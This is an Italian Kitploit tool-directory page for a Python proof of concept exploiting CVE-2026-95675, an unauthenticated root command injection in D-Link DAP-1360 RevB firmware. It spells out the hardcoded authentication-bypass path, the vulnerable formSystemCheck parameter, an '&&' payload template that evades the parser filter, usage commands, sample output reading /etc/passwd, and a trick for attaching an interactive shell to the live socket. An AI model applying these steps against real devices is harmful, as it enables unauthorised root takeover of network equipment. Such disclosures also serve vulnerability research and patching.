Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-95675 — PoC Python che sfrutta CVE-2026-95675, un'iniezione di comandi root non autenticata nel firmware D-Link DAP-1360 RevB tramite un bypass di autenticazione hardcoded e l'handler formSystemCheck. | Kitploit
Strumenti/GitHubGitHub/d6fault/cve-2026-95675
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitReverse EngineeringSfruttamento di Applicazioni WebSicurezza Hardware e IoTStrumento di Accesso RemotoAnalisi del Firmware
GitHubd6fault/cve-2026-95675

CVE-2026-95675

1211h 43m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC Python che sfrutta CVE-2026-95675, un'iniezione di comandi root non autenticata nel firmware D-Link DAP-1360 RevB tramite un bypass di autenticazione hardcoded e l'handler formSystemCheck.

Vedi Repository

CVE-2026-95675 — D-Link DAP-1360 RevB

Esecuzione di comandi root remota non autenticata (CWE-78 — OS Command Injection) nell'handler formSystemCheck, raggiungibile tramite un backdoor di autenticazione hardcoded. Verificato su DAP-1360 RevB, firmware 2.14B05.

Causa principale

Due problemi indipendenti concatenati:

1. Percorso di bypass dell'autenticazione hardcoded. In main (httpd @ 0x4064c8):

root@kitploit:~
strcasecmp(request_path, "dEfWzDLOgIn")   ; token @ 0x48046c
  ...
  sw 1, 8(sp_login_slot)                  ; mark this source-IP as logged in

GET /dEfWzDLOgIn restituisce 404 (non è un file reale) ma, come effetto collaterale, contrassegna lo slot di sessione dell'IP sorgente richiedente come autenticato — senza username, password o captcha.

2. OS command injection. formSystemCheck (POST /apply.cgi?formSystemCheck) costruisce un comando shell con:

root@kitploit:~
_system("ping %s -c 2 >/tmp/test_ping", cgi("ipv4_ping"))

ipv4_ping viene passato non sanificato nella format string; _system() usa vsprintf in un buffer fisso sullo stack e lo passa a system(). L'handler non esegue alcun controllo di autenticazione proprio.

Avvertenza sul parser

Il parser del body POST di busybox rimuove ;, |, backtick e newline, ma && sopravvive. Un payload deve terminare il prefisso ping e poi concatenare con &&, ad esempio:

root@kitploit:~
127.0.0.1 -c 1 && <command> > /www/out.htm && x

Utilizzo

root@kitploit:~
python3 autopoc.py <target> [command]

python3 autopoc.py 192.168.0.50
python3 autopoc.py 192.168.0.50 "ls -la /"
ArgDescrizione
targethost/IP di destinazione (schema predefinito http://)
command (opzionale)comando root da eseguire (predefinito: ); usare , non /`

Come funziona

  1. GET /dEfWzDLOgIn — attiva il bypass di autenticazione hardcoded (restituisce 404; l'effetto collaterale avviene lato server).
  2. POST /apply.cgi?formSystemCheck con ipv4_ping=127.0.0.1 -c 1 && <cmd> > /www/<OUT> && x — command injection come root.
  3. GET /<OUT> — recupera l'output del comando (httpd serve .htm/.html, non .txt).

Output

root@kitploit:~
[*] target   : 192.168.0.50
[*] command  : cat /etc/passwd
[*] GET /dEfWzDLOgIn -> 404 (login slot flagged)
[*] POST /apply.cgi?formSystemCheck -> 302
[+] output (RCE.htm):
------------------------------------------------------------
root:x:0:0:root:/:/dev/null
nobody:x:0:0:nobody:/:/dev/null
------------------------------------------------------------

Note / limitazioni

  • Il busybox del dispositivo non ha nc, wget, base64, chmod, id — usare cat, echo, ls, cp, ecc.
  • L'output viene scritto nella docroot scrivibile da tutti e recuperato via HTTP (nessun listener richiesto).
  • Per una shell interattiva, il processo iniettato eredita il socket del client come fd 5; combinato con httpd che rinvia la risposta fino al ritorno di _system(), sh <&5 >&5 2>&5 può collegare una shell alla connessione attiva (fragile sotto QEMU in user-mode; meglio su hardware reale).
  • Non applicabile a DAP-1360 RevC1 / firmware 3.00 o alle build "D-Link Russia" DIR/xDSL — endpoint, docroot e parser diversi. Questi richiedono un'analisi separata.

Esposizione

Shodan ("CAMEO-httpd", il banner del vendor httpd) mostra solo un piccolo numero di istanze esposte a Internet di questo esatto codebase; il dispositivo è principalmente un access point lato LAN. Lo sfruttamento richiede la raggiungibilità dell'interfaccia di gestione web.

Scarica lo strumento
cat /etc/passwd
&&
;